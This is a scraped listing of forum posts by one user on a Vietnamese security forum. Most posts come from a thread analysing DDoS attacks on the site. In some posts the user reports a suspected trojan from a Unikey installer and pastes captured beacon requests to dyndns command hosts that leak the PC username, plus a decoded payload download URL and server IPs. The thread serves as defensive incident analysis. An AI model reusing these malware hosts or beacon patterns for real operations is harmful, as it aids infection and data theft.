<![CDATA[Messages posted by "lequi"]]> /hvaonline/posts/listByUser/140973.html JForum - http://www.jforum.net Apache vẫn bình thường, nhưng 2 hàm curl php và file_get_contents chậm /hvaonline/posts/preList/43737/270818.html#270818 /hvaonline/posts/preList/43737/270818.html#270818 GMT Vấn đề về ghi nhận IP client thật sau khi sử dụng nginx /hvaonline/posts/preList/43587/270226.html#270226 /hvaonline/posts/preList/43587/270226.html#270226 GMT DNP FireWall /hvaonline/posts/preList/43159/268445.html#268445 /hvaonline/posts/preList/43159/268445.html#268445 GMT Apache2 trên centos không chạy được PHP ( xtremedia ) /hvaonline/posts/preList/42787/266109.html#266109 /hvaonline/posts/preList/42787/266109.html#266109 GMT Apache2 trên centos không chạy được PHP ( xtremedia ) /hvaonline/posts/preList/42787/266108.html#266108 /hvaonline/posts/preList/42787/266108.html#266108 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/246669.html#246669 /hvaonline/posts/preList/39641/246669.html#246669 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/245486.html#245486 /hvaonline/posts/preList/39641/245486.html#245486 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

eicar wrote:
Phì cười, em thấy chính các bác Admin cũng mất thời gian cho việc này, hiển nhiên là ảnh hưởng đến công việc chính của mình. Thực sự các bác nghĩ công việc chính của các bác là sống chết với HVA này ?. Các bạn STL kia thì công việc chính của các bạn ấy là phá hoại rồi, em thấy công sức các bạn ấy bỏ ra để phá hoại có khi không nhiều hơn công sức các bác bỏ ra để phòng chống. 
Mình thấy có vẻ pác là người bận rộn, lo lắng đến bản thân hơi nhiều. Ở đây mọi người quan tâm đến diễn đàn mình hoạt động (học hỏi, trao đổi ...) nên mới cùng tham gia. Còn nói về "các bác Admin" thì việc "bỏ công sức" cũng đâu có gì là quá "rảnh", vì đối với "Admin", thì website của mình cũng chính là niềm vui, đứa con tinh thần của mình. Vả lại trong quá trình điều tra, bỏ ra công sức trong thời gian này mọi người cũng học được nhiều thứ. Không có gì là phí phạm và "Phì cười" cả :)]]>
/hvaonline/posts/preList/39641/245262.html#245262 /hvaonline/posts/preList/39641/245262.html#245262 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header.  Theo em nghĩ, crawl cũng chỉ là 1 quá trình duyệt 1 website, parse nội dung HTML của trang đó, và lấy hết những href link trong trang, rồi tiếp tục request đến các href link đó thôi mà ? @texudo: Hình như việc thay đổi User-Agent không liên quan đến việc server tạo ra thread khác đâu bạn.]]> /hvaonline/posts/preList/39641/245187.html#245187 /hvaonline/posts/preList/39641/245187.html#245187 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Công nhận các bạn STL "sneaky" thiệt :-) . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm. Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn). 
Tụi STL làm đầy log tomcat hả a :D]]>
/hvaonline/posts/preList/39641/244541.html#244541 /hvaonline/posts/preList/39641/244541.html#244541 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244431.html#244431 /hvaonline/posts/preList/39641/244431.html#244431 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244367.html#244367 /hvaonline/posts/preList/39641/244367.html#244367 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244345.html#244345 /hvaonline/posts/preList/39641/244345.html#244345 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244337.html#244337 /hvaonline/posts/preList/39641/244337.html#244337 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244325.html#244325 /hvaonline/posts/preList/39641/244325.html#244325 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244292.html#244292 /hvaonline/posts/preList/39641/244292.html#244292 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244289.html#244289 /hvaonline/posts/preList/39641/244289.html#244289 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244280.html#244280 /hvaonline/posts/preList/39641/244280.html#244280 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244228.html#244228 /hvaonline/posts/preList/39641/244228.html#244228 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244220.html#244220 /hvaonline/posts/preList/39641/244220.html#244220 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244219.html#244219 /hvaonline/posts/preList/39641/244219.html#244219 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244216.html#244216 /hvaonline/posts/preList/39641/244216.html#244216 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Mà em phát hiện ra 2 file này, em vui dã man. Theo suy đoán của em, thì nguồn virus là đây: http://nethoabinh.com/showthread.php?t=315 Và rất rất nhiều các phần mềm khác trên trang này TOP google. Hi vọng là em không làm mọi người đi sai hướng, cách đây khoảng vào lúc 1h AM ngày hôm nay, em đã tìm kiếm thử 2 file này nhưng hoàn toàn không có, vậy tại sao bây giờ lại có ???. Mà em có làm gì đâu chứ. Lạ 1 điều là file unikey em setup vào máy (nếu như dự đoán là trước đây e chưa từng dính) ngày 24, thì các file này thấy ngày tạo ra lại là ngày 23, mà ngày 23 em nhậu tơi bời có biết gì đâu, mỗi pà chị em dùng máy :(. Mà việc chỉnh sửa ngày tháng tạo ra file đối với mấy anh STL là quá quá dễ, em cũng làm được nữa (bằng AutoIT hehe). Hay là em đã vô tình nói cho các anh STL kích hoạt nó lên. Và giờ các thông tin của em tiêu tùng hết, mấy anh STL ơi em là dân đen, đừng đụng đến công việc của em dùm :((. Post sau e sẽ gửi cả đống file này lên. ]]>
/hvaonline/posts/preList/39641/244215.html#244215 /hvaonline/posts/preList/39641/244215.html#244215 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244213.html#244213 /hvaonline/posts/preList/39641/244213.html#244213 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi 
Mình rất sẵn lòng. Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì :(, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn). Không biết mình phải làm gì tiếp đây?]]>
/hvaonline/posts/preList/39641/244183.html#244183 /hvaonline/posts/preList/39641/244183.html#244183 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: maowoli.dyndns-free.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: biouzhen.dyndns-server.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: tongfeirou.dyndns-web.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: maowoli.dyndns-free.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close GET /banner1.png?cpn=LEQUY-PC HTTP/1.1 Host: biouzhen.dyndns-server.com User-Agent: Gozilla_2/General Accept: */* Pragma: no-cache Cache-Control: no-cache Connection: close   ]]> /hvaonline/posts/preList/39641/244155.html#244155 /hvaonline/posts/preList/39641/244155.html#244155 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD chứa đường dẫn được mã hoá, key là n / 123 = 456. Thuật toán mã hoá thì mình chưa xem kĩ nhưng thiết nghĩ không cần lắm vì xâu này cố định rồi. nó sau khi giải mã ra là http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default. cái link để download là http://poxxf.com/flash.swf?cpn=<User name>   Thôi tiêu, em vừa thấy acoustics89 nhắc đến User Agent: Gozilla và cấu trúc request kiểu ?cpn=[PC USERNAME] Bài trước em có nhắc đến User Agent này, vì vội quá nên chưa gửi cho a PXMMRF được. Phải chăng file unikey ở http://nethoabinh.com/showthread.php?t=315, và nghi ngờ ở http://nethoabinh.com/showthread.php?t=651 cũng của STL (nhưng file này đã bị xoá) ??? Các từ khoá liên quan đến việc tải unikey, flash player trên google trang này (nethoabinh) đều có kết quả đứng đầu (top). Vừa bật lại cái Wireshark, có 1 vài thông tin bắt được (tên miền gì toàn tiếng Trung Quốc >"<):
maowoli.dyndns-free.com (Destination IP: 78.110.24.85) biouzhen.dyndns-server.com (Destination IP: 78.110.24.85) tongfeirou.dyndns-web.com (Destination: server86944.santrex.net)  
Vẫn chưa biết được service/process nào liên quan đến những URL này :(. Em đang bật smartsniff của nirsoft nhưng tình hình có vẻ im lặng quá. Ngóng chờ tiếp :(]]>
/hvaonline/posts/preList/39641/244154.html#244154 /hvaonline/posts/preList/39641/244154.html#244154 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244048.html#244048 /hvaonline/posts/preList/39641/244048.html#244048 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

cayaoanh830 wrote:
Theo như sự phân tích ở trên thì các vụ tấn công Ddos đều giả các cuộc lức wed bình thường nhưng dù gì thì máy tính vẫn là máy tính nó không có trí thông minh bằng người chế tạo ra nó được nó cũng chỉ làm theo những dòng code có sẵn. dựa vào sự suy nghĩ trên em nghĩ ra được 1 cách không biết có được không nếu có gì sai xin các bác bỏ qua cho em . dừng chém em tội nghiệp em lắm :) : =>Tại sau chúng ta không phân biệt sự truy cập đó là người hay là máy bằng cách đưa ra các câu hỏi (như 10+5 = ? hoặc đưa ra một từ tiếng anh mất 1 chữ và nghĩa tiếng việt của nó để ta điền vào ...) để người nào muốn truy cập vào một trang bất kì của HVA cũng phải giải nó.  
Đến lúc đống zombie đó kết nối được đến tầng này thì chắc server nào bị dội cũng sụm bà chè rồi. Hehe Em vừa vọc vài thứ trong máy, có lòi ra mấy URL (via whireshark):
http://tongfeirou.dyndns-web.com/banner1.png?cpn=<COMPUTER USERNAME> (404) https://biouzhen.dyndns-server.com/banner1.png?cpn=<COMPUTER USERNAME> (403 nginx)  
với User-Agent đều là:
Gozilla_2/General (??) 
Đang tiếp tục vọc tiếp ...]]>
/hvaonline/posts/preList/39641/244040.html#244040 /hvaonline/posts/preList/39641/244040.html#244040 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/243916.html#243916 /hvaonline/posts/preList/39641/243916.html#243916 GMT